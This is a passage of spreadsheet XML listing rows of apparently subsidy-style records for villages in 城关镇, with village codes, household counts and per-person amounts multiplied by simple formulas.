    </row>
    <row r="547" customHeight="1" spans="1:11">
      <c r="A547" s="16" t="s">
        <v>1527</v>
      </c>
      <c r="B547" s="17" t="str">
        <f>B546</f>
        <v>城关镇</v>
      </c>
      <c r="C547" s="17" t="str">
        <f>C546</f>
        <v>西北村</v>
      </c>
      <c r="D547" s="16" t="s">
        <v>1528</v>
      </c>
      <c r="E547" s="16" t="s">
        <v>269</v>
      </c>
      <c r="F547" s="17" t="str">
        <f>F546</f>
        <v>4113210106</v>
      </c>
      <c r="G547" s="17"/>
      <c r="H547" s="17"/>
      <c r="I547" s="17"/>
      <c r="J547" s="17"/>
      <c r="K547" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="548" customHeight="1" spans="1:11">
      <c r="A548" s="16" t="s">
        <v>1529</v>
      </c>
      <c r="B548" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C548" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D548" s="17" t="s">
        <v>1530</v>
      </c>
      <c r="E548" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F548" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G548" s="17">
        <v>1</v>
      </c>
      <c r="H548" s="18">
        <v>365</v>
      </c>
      <c r="I548" s="17">
        <f>H548*G548</f>
        <v>365</v>
      </c>
      <c r="J548" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K548" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="549" customHeight="1" spans="1:11">
      <c r="A549" s="16" t="s">
        <v>1531</v>
      </c>
      <c r="B549" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C549" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D549" s="17" t="s">
        <v>1532</v>
      </c>
      <c r="E549" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F549" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G549" s="17">
        <v>1</v>
      </c>
      <c r="H549" s="18">
        <v>365</v>
      </c>
      <c r="I549" s="17">
        <f>H549*G549</f>
        <v>365</v>
      </c>
      <c r="J549" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K549" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="550" customHeight="1" spans="1:11">
      <c r="A550" s="16" t="s">
        <v>1533</v>
      </c>
      <c r="B550" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C550" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D550" s="17" t="s">
        <v>1534</v>
      </c>
      <c r="E550" s="17" t="s">
        <v>554</v>
      </c>
      <c r="F550" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G550" s="17">
        <v>1</v>
      </c>
      <c r="H550" s="18">
        <v>365</v>
      </c>
      <c r="I550" s="17">
        <f>H550*G550</f>
        <v>365</v>
      </c>
      <c r="J550" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K550" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="551" customHeight="1" spans="1:11">
      <c r="A551" s="16" t="s">
        <v>1535</v>
      </c>
      <c r="B551" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C551" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D551" s="17" t="s">
        <v>1536</v>
      </c>
      <c r="E551" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F551" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G551" s="17">
        <v>2</v>
      </c>
      <c r="H551" s="18">
        <v>325</v>
      </c>
      <c r="I551" s="17">
        <f>H551*G551</f>
        <v>650</v>
      </c>
      <c r="J551" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K551" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="552" customHeight="1" spans="1:11">
      <c r="A552" s="16" t="s">
        <v>1537</v>
      </c>
      <c r="B552" s="17" t="str">
        <f>B551</f>
        <v>城关镇</v>
      </c>
      <c r="C552" s="17" t="str">
        <f>C551</f>
        <v>东北村</v>
      </c>
      <c r="D552" s="16" t="s">
        <v>1538</v>
      </c>
      <c r="E552" s="16" t="s">
        <v>542</v>
      </c>
      <c r="F552" s="17" t="str">
        <f>F551</f>
        <v>4113210103</v>
      </c>
      <c r="G552" s="17"/>
      <c r="H552" s="17"/>
      <c r="I552" s="17"/>
      <c r="J552" s="17"/>
      <c r="K552" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="553" customHeight="1" spans="1:11">
      <c r="A553" s="16" t="s">
        <v>1539</v>
      </c>
      <c r="B553" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C553" s="17" t="s">
        <v>1540</v>
      </c>
      <c r="D553" s="17" t="s">
        <v>1541</v>
      </c>
      <c r="E553" s="17" t="s">
        <v>1542</v>
      </c>
      <c r="F553" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G553" s="17">
        <v>1</v>
      </c>
      <c r="H553" s="18">
        <v>365</v>
      </c>
      <c r="I553" s="17">
        <f>H553*G553</f>
        <v>365</v>
      </c>
      <c r="J553" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K553" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="554" customHeight="1" spans="1:11">
      <c r="A554" s="16" t="s">
        <v>1543</v>
      </c>
      <c r="B554" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C554" s="17" t="s">
        <v>1544</v>
      </c>
      <c r="D554" s="17" t="s">
        <v>1545</v>
      </c>
      <c r="E554" s="17" t="s">
        <v>874</v>
      </c>
      <c r="F554" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G554" s="17">
        <v>2</v>
      </c>
      <c r="H554" s="18">
        <v>325</v>
      </c>
      <c r="I554" s="17">
        <f>H554*G554</f>
        <v>650</v>
      </c>
      <c r="J554" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K554" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="555" customHeight="1" spans="1:11">
      <c r="A555" s="16" t="s">
        <v>1546</v>
      </c>
      <c r="B555" s="17" t="str">
        <f>B554</f>
        <v>城关镇</v>
      </c>
      <c r="C555" s="17" t="str">
        <f>C554</f>
        <v>城关镇中华</v>
      </c>
      <c r="D555" s="16" t="s">
        <v>1547</v>
      </c>
      <c r="E555" s="16" t="s">
        <v>773</v>
      </c>
      <c r="F555" s="17" t="str">
        <f>F554</f>
        <v>4113210108</v>
      </c>
      <c r="G555" s="17"/>
      <c r="H555" s="17"/>
      <c r="I555" s="17"/>
      <c r="J555" s="17"/>
      <c r="K555" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="556" customHeight="1" spans="1:11">
      <c r="A556" s="16" t="s">
        <v>1548</v>
      </c>
      <c r="B556" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C556" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D556" s="17" t="s">
        <v>1549</v>
      </c>
      <c r="E556" s="17" t="s">
        <v>1550</v>
      </c>
      <c r="F556" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G556" s="17">
        <v>1</v>
      </c>
      <c r="H556" s="18">
        <v>365</v>
      </c>
      <c r="I556" s="17">
        <f>H556*G556</f>
        <v>365</v>
      </c>
      <c r="J556" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K556" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="557" customHeight="1" spans="1:11">
      <c r="A557" s="16" t="s">
        <v>1551</v>
      </c>
      <c r="B557" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C557" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D557" s="17" t="s">
        <v>1552</v>
      </c>
      <c r="E557" s="17" t="s">
        <v>1553</v>
      </c>
      <c r="F557" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G557" s="17">
        <v>3</v>
      </c>
      <c r="H557" s="18">
        <v>290</v>
      </c>
      <c r="I557" s="17">
        <f>H557*G557</f>
        <v>870</v>
      </c>
      <c r="J557" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K557" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="558" customHeight="1" spans="1:11">
      <c r="A558" s="16" t="s">
        <v>1554</v>
      </c>
      <c r="B558" s="17" t="str">
        <f>B557</f>
        <v>城关镇</v>
      </c>
      <c r="C558" s="17" t="str">
        <f>C557</f>
        <v>东北村</v>
      </c>
      <c r="D558" s="23" t="s">
        <v>1555</v>
      </c>
      <c r="E558" s="24" t="s">
        <v>1556</v>
      </c>
      <c r="F558" s="17" t="str">
        <f>F557</f>
        <v>4113210103</v>
      </c>
      <c r="G558" s="17"/>
      <c r="H558" s="17"/>
      <c r="I558" s="17"/>
      <c r="J558" s="17"/>
      <c r="K558" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="559" customHeight="1" spans="1:11">
      <c r="A559" s="16" t="s">
        <v>1557</v>
      </c>
      <c r="B559" s="17" t="str">
        <f>B558</f>
        <v>城关镇</v>
      </c>
      <c r="C559" s="17" t="str">
        <f>C558</f>
        <v>东北村</v>
      </c>
      <c r="D559" s="24" t="s">
        <v>1558</v>
      </c>
      <c r="E559" s="24" t="s">
        <v>1559</v>
      </c>
      <c r="F559" s="17" t="str">
        <f>F558</f>
        <v>4113210103</v>
      </c>
      <c r="G559" s="17"/>
      <c r="H559" s="17"/>
      <c r="I559" s="17"/>
      <c r="J559" s="17"/>
      <c r="K559" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="560" customHeight="1" spans="1:11">
      <c r="A560" s="16" t="s">
        <v>1560</v>
      </c>
      <c r="B560" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C560" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D560" s="17" t="s">
        <v>1561</v>
      </c>
      <c r="E560" s="17" t="s">
        <v>1562</v>
      </c>
      <c r="F560" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G560" s="17">
        <v>1</v>
      </c>
      <c r="H560" s="18">
        <v>365</v>
      </c>
      <c r="I560" s="17">
        <f>H560*G560</f>
        <v>365</v>
      </c>
      <c r="J560" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K560" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="561" customHeight="1" spans="1:11">
      <c r="A561" s="16" t="s">
        <v>1563</v>
      </c>
      <c r="B561" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C561" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D561" s="17" t="s">
        <v>1564</v>
      </c>
      <c r="E561" s="17" t="s">
        <v>675</v>
      </c>
      <c r="F561" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G561" s="17">
        <v>2</v>
      </c>
      <c r="H561" s="18">
        <v>325</v>
      </c>
      <c r="I561" s="17">
        <f>H561*G561</f>
        <v>650</v>
      </c>
      <c r="J561" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K561" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="562" customHeight="1" spans="1:11">
      <c r="A562" s="16" t="s">
        <v>1565</v>
      </c>
      <c r="B562" s="17" t="str">
        <f>B561</f>
        <v>城关镇</v>
      </c>
      <c r="C562" s="17" t="str">
        <f>C561</f>
        <v>东北村</v>
      </c>
      <c r="D562" s="23" t="s">
        <v>1566</v>
      </c>
      <c r="E562" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F562" s="17" t="str">
        <f>F561</f>
        <v>4113210103</v>
      </c>
      <c r="G562" s="17"/>
      <c r="H562" s="17"/>
      <c r="I562" s="17"/>
      <c r="J562" s="17"/>
      <c r="K562" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="563" customHeight="1" spans="1:11">
      <c r="A563" s="16" t="s">
        <v>1567</v>
      </c>
      <c r="B563" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C563" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D563" s="17" t="s">
        <v>1568</v>
      </c>
      <c r="E563" s="17" t="s">
        <v>309</v>
      </c>
      <c r="F563" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G563" s="17">
        <v>2</v>
      </c>
      <c r="H563" s="18">
        <v>325</v>
      </c>
      <c r="I563" s="17">
        <f>H563*G563</f>
        <v>650</v>
      </c>
      <c r="J563" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K563" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="564" customHeight="1" spans="1:11">
      <c r="A564" s="16" t="s">
        <v>1569</v>
      </c>
      <c r="B564" s="17" t="str">
        <f>B563</f>
        <v>城关镇</v>
      </c>
      <c r="C564" s="17" t="str">
        <f>C563</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D564" s="27" t="s">
        <v>1570</v>
      </c>
      <c r="E564" s="27" t="s">
        <v>281</v>
      </c>
      <c r="F564" s="17" t="str">
        <f>F563</f>
        <v>4113210102</v>
      </c>
      <c r="G564" s="17"/>
      <c r="H564" s="17"/>
      <c r="I564" s="17"/>
      <c r="J564" s="17"/>
      <c r="K564" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="565" customHeight="1" spans="1:11">
      <c r="A565" s="16" t="s">
        <v>1571</v>
      </c>
      <c r="B565" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C565" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D565" s="17" t="s">
        <v>1572</v>
      </c>
      <c r="E565" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F565" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G565" s="17">
        <v>1</v>
      </c>
      <c r="H565" s="18">
        <v>365</v>
      </c>
      <c r="I565" s="17">
        <f>H565*G565</f>
        <v>365</v>
      </c>
      <c r="J565" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K565" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="566" customHeight="1" spans="1:11">
      <c r="A566" s="16" t="s">
        <v>1573</v>
      </c>
      <c r="B566" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C566" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D566" s="17" t="s">
        <v>1574</v>
      </c>
      <c r="E566" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F566" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G566" s="17">
        <v>1</v>
      </c>
      <c r="H566" s="18">
        <v>365</v>
      </c>
      <c r="I566" s="17">
        <f>H566*G566</f>
        <v>365</v>
      </c>
      <c r="J566" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K566" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="567" customHeight="1" spans="1:11">
      <c r="A567" s="16" t="s">
        <v>1575</v>
      </c>
      <c r="B567" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C567" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D567" s="17" t="s">
        <v>1576</v>
      </c>
      <c r="E567" s="17" t="s">
        <v>389</v>
      </c>
      <c r="F567" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G567" s="17">
        <v>1</v>
      </c>
      <c r="H567" s="18">
        <v>365</v>
      </c>
      <c r="I567" s="17">
        <f>H567*G567</f>
        <v>365</v>
      </c>
      <c r="J567" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K567" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="568" customHeight="1" spans="1:11">
      <c r="A568" s="16" t="s">
        <v>1577</v>
      </c>
      <c r="B568" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C568" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D568" s="17" t="s">
        <v>1578</v>
      </c>
      <c r="E568" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F568" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G568" s="17">
        <v>1</v>
      </c>
      <c r="H568" s="18">
        <v>365</v>
      </c>
      <c r="I568" s="17">
        <f>H568*G568</f>
        <v>365</v>
      </c>
      <c r="J568" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K568" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="569" customHeight="1" spans="1:11">
      <c r="A569" s="16" t="s">
        <v>1579</v>
      </c>
      <c r="B569" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C569" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D569" s="17" t="s">
        <v>1580</v>
      </c>
      <c r="E569" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F569" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G569" s="17">
        <v>2</v>
      </c>
      <c r="H569" s="18">
        <v>325</v>
      </c>
      <c r="I569" s="17">
        <f>H569*G569</f>
        <v>650</v>
      </c>
      <c r="J569" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K569" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="570" customHeight="1" spans="1:11">
      <c r="A570" s="16" t="s">
        <v>1581</v>
      </c>
      <c r="B570" s="17" t="str">
        <f>B569</f>
        <v>城关镇</v>
      </c>
      <c r="C570" s="17" t="str">
        <f>C569</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D570" s="24" t="s">
        <v>1582</v>
      </c>
      <c r="E570" s="24" t="s">
        <v>612</v>
      </c>
      <c r="F570" s="17" t="str">
        <f>F569</f>
        <v>4113210102</v>
      </c>
      <c r="G570" s="17"/>
      <c r="H570" s="17"/>
      <c r="I570" s="17"/>
      <c r="J570" s="17"/>
      <c r="K570" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="571" customHeight="1" spans="1:11">
      <c r="A571" s="16" t="s">
        <v>1583</v>
      </c>
      <c r="B571" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C571" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D571" s="17" t="s">
        <v>1584</v>
      </c>
      <c r="E571" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F571" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G571" s="17">
        <v>1</v>
      </c>
      <c r="H571" s="18">
        <v>365</v>
      </c>
      <c r="I571" s="17">
        <f t="shared" ref="I571:I580" si="23">H571*G571</f>
        <v>365</v>
      </c>
      <c r="J571" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K571" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="572" customHeight="1" spans="1:11">
      <c r="A572" s="16" t="s">
        <v>1585</v>
      </c>
      <c r="B572" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C572" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D572" s="17" t="s">
        <v>1586</v>
      </c>
      <c r="E572" s="17" t="s">
        <v>1587</v>
      </c>
      <c r="F572" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G572" s="17">
        <v>1</v>
      </c>
      <c r="H572" s="18">
        <v>365</v>
      </c>
      <c r="I572" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J572" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K572" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="573" customHeight="1" spans="1:11">
      <c r="A573" s="16" t="s">
        <v>1588</v>
      </c>
      <c r="B573" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C573" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D573" s="17" t="s">
        <v>1589</v>
      </c>
      <c r="E573" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F573" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G573" s="17">
        <v>1</v>
      </c>
      <c r="H573" s="18">
        <v>365</v>
      </c>
      <c r="I573" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J573" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K573" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="574" customHeight="1" spans="1:11">
      <c r="A574" s="16" t="s">
        <v>1590</v>
      </c>
      <c r="B574" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C574" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D574" s="17" t="s">
        <v>1591</v>
      </c>
      <c r="E574" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F574" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G574" s="17">
        <v>1</v>
      </c>
      <c r="H574" s="18">
        <v>365</v>
      </c>
      <c r="I574" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J574" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K574" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="575" customHeight="1" spans="1:11">
      <c r="A575" s="16" t="s">
        <v>1592</v>
      </c>
      <c r="B575" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C575" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D575" s="17" t="s">
        <v>1593</v>
      </c>
      <c r="E575" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F575" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G575" s="17">
        <v>1</v>
      </c>
      <c r="H575" s="18">
        <v>365</v>
      </c>
      <c r="I575" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J575" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K575" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="576" customHeight="1" spans="1:11">
      <c r="A576" s="16" t="s">
        <v>1594</v>
      </c>
      <c r="B576" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C576" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D576" s="17" t="s">
        <v>1595</v>
      </c>
      <c r="E576" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F576" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G576" s="17">
        <v>1</v>
      </c>
      <c r="H576" s="18">
        <v>365</v>
      </c>
      <c r="I576" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J576" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K576" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="577" customHeight="1" spans="1:11">
      <c r="A577" s="16" t="s">
        <v>1596</v>
      </c>
      <c r="B577" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C577" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D577" s="17" t="s">
        <v>1597</v>
      </c>
      <c r="E577" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F577" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G577" s="17">
        <v>1</v>
      </c>
      <c r="H577" s="18">
        <v>365</v>
      </c>
      <c r="I577" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J577" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K577" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="578" customHeight="1" spans="1:11">
      <c r="A578" s="16" t="s">
        <v>1598</v>
      </c>
      <c r="B578" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C578" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D578" s="17" t="s">
        <v>1599</v>
      </c>
      <c r="E578" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F578" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G578" s="17">
        <v>1</v>
      </c>
      <c r="H578" s="18">
        <v>365</v>
      </c>
      <c r="I578" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J578" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K578" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="579" customHeight="1" spans="1:11">
      <c r="A579" s="16" t="s">
        <v>1600</v>
      </c>
      <c r="B579" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C579" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D579" s="17" t="s">
        <v>1601</v>
      </c>
      <c r="E579" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F579" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G579" s="17">
        <v>1</v>
      </c>
      <c r="H579" s="18">
        <v>365</v>
      </c>
      <c r="I579" s="17">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J579" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K579" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="580" customHeight="1" spans="1:11">
      <c r="A580" s="16" t="s">
        <v>1602</v>
      </c>
      <c r="B580" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C580" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D580" s="17" t="s">
        <v>1603</v>
      </c>
      <c r="E580" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F580" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G580" s="17">
        <v>2</v>
      </c>
      <c r="H580" s="18">
        <v>325</v>
      </c>
      <c r="I580" s="17">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J580" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K580" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="581" customHeight="1" spans="1:11">
      <c r="A581" s="16" t="s">
        <v>1604</v>
      </c>
      <c r="B581" s="17" t="str">
        <f>B580</f>
        <v>城关镇</v>
      </c>
      <c r="C581" s="17" t="str">
        <f>C580</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D581" s="24" t="s">
        <v>1605</v>
      </c>
      <c r="E581" s="24" t="s">
        <v>416</v>
      </c>
      <c r="F581" s="17" t="str">
        <f>F580</f>
        <v>4113210103</v>
      </c>
      <c r="G581" s="17"/>
      <c r="H581" s="17"/>
      <c r="I581" s="17"/>
      <c r="J581" s="17"/>
      <c r="K581" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="582" customHeight="1" spans="1:11">
      <c r="A582" s="16" t="s">
        <v>1606</v>
      </c>
      <c r="B582" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C582" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D582" s="17" t="s">
        <v>1607</v>
      </c>
      <c r="E582" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F582" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G582" s="17">
        <v>2</v>
      </c>
      <c r="H582" s="18">
        <v>325</v>
      </c>
      <c r="I582" s="17">
        <f>H582*G582</f>
        <v>650</v>
      </c>
      <c r="J582" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K582" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="583" customHeight="1" spans="1:11">
      <c r="A583" s="16" t="s">
        <v>1608</v>
      </c>
      <c r="B583" s="17" t="str">
        <f>B582</f>
        <v>城关镇</v>
      </c>
      <c r="C583" s="17" t="str">
        <f>C582</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D583" s="24" t="s">
        <v>1609</v>
      </c>
      <c r="E583" s="24" t="s">
        <v>1610</v>
      </c>
      <c r="F583" s="17" t="str">
        <f>F582</f>
        <v>4113210103</v>
      </c>
      <c r="G583" s="17"/>
      <c r="H583" s="17"/>
      <c r="I583" s="17"/>
      <c r="J583" s="17"/>
      <c r="K583" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="584" customHeight="1" spans="1:11">
      <c r="A584" s="16" t="s">
        <v>1611</v>
      </c>
      <c r="B584" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C584" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D584" s="17" t="s">
        <v>1612</v>
      </c>
      <c r="E584" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F584" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G584" s="17">
        <v>2</v>
      </c>
      <c r="H584" s="18">
        <v>325</v>
      </c>
      <c r="I584" s="17">
        <f>H584*G584</f>
        <v>650</v>
      </c>
      <c r="J584" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K584" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="585" customHeight="1" spans="1:11">
      <c r="A585" s="16" t="s">
        <v>1613</v>
      </c>
      <c r="B585" s="17" t="str">
        <f>B584</f>
        <v>城关镇</v>
      </c>
      <c r="C585" s="17" t="str">
        <f>C584</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D585" s="24" t="s">
        <v>1614</v>
      </c>
      <c r="E585" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F585" s="17" t="str">
        <f>F584</f>
        <v>4113210103</v>
      </c>
      <c r="G585" s="17"/>
      <c r="H585" s="17"/>
      <c r="I585" s="17"/>
      <c r="J585" s="17"/>
      <c r="K585" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="586" customHeight="1" spans="1:11">
      <c r="A586" s="16" t="s">
        <v>1615</v>
      </c>
      <c r="B586" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C586" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D586" s="17" t="s">
        <v>1616</v>
      </c>
      <c r="E586" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F586" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G586" s="17">
        <v>2</v>
      </c>
      <c r="H586" s="18">
        <v>325</v>
      </c>
      <c r="I586" s="17">
        <f>H586*G586</f>
        <v>650</v>
      </c>
      <c r="J586" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K586" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="587" customHeight="1" spans="1:11">
      <c r="A587" s="16" t="s">
        <v>1617</v>
      </c>
      <c r="B587" s="17" t="str">
        <f>B586</f>
        <v>城关镇</v>
      </c>
      <c r="C587" s="17" t="str">
        <f>C586</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D587" s="24" t="s">
        <v>1618</v>
      </c>
      <c r="E587" s="24" t="s">
        <v>1619</v>
      </c>
      <c r="F587" s="17" t="str">
        <f>F586</f>
        <v>4113210106</v>
      </c>
      <c r="G587" s="17"/>
      <c r="H587" s="17"/>
      <c r="I587" s="17"/>
      <c r="J587" s="17"/>
      <c r="K587" s="17" t="s">
        <v>225</v>
      </c>
    </row>
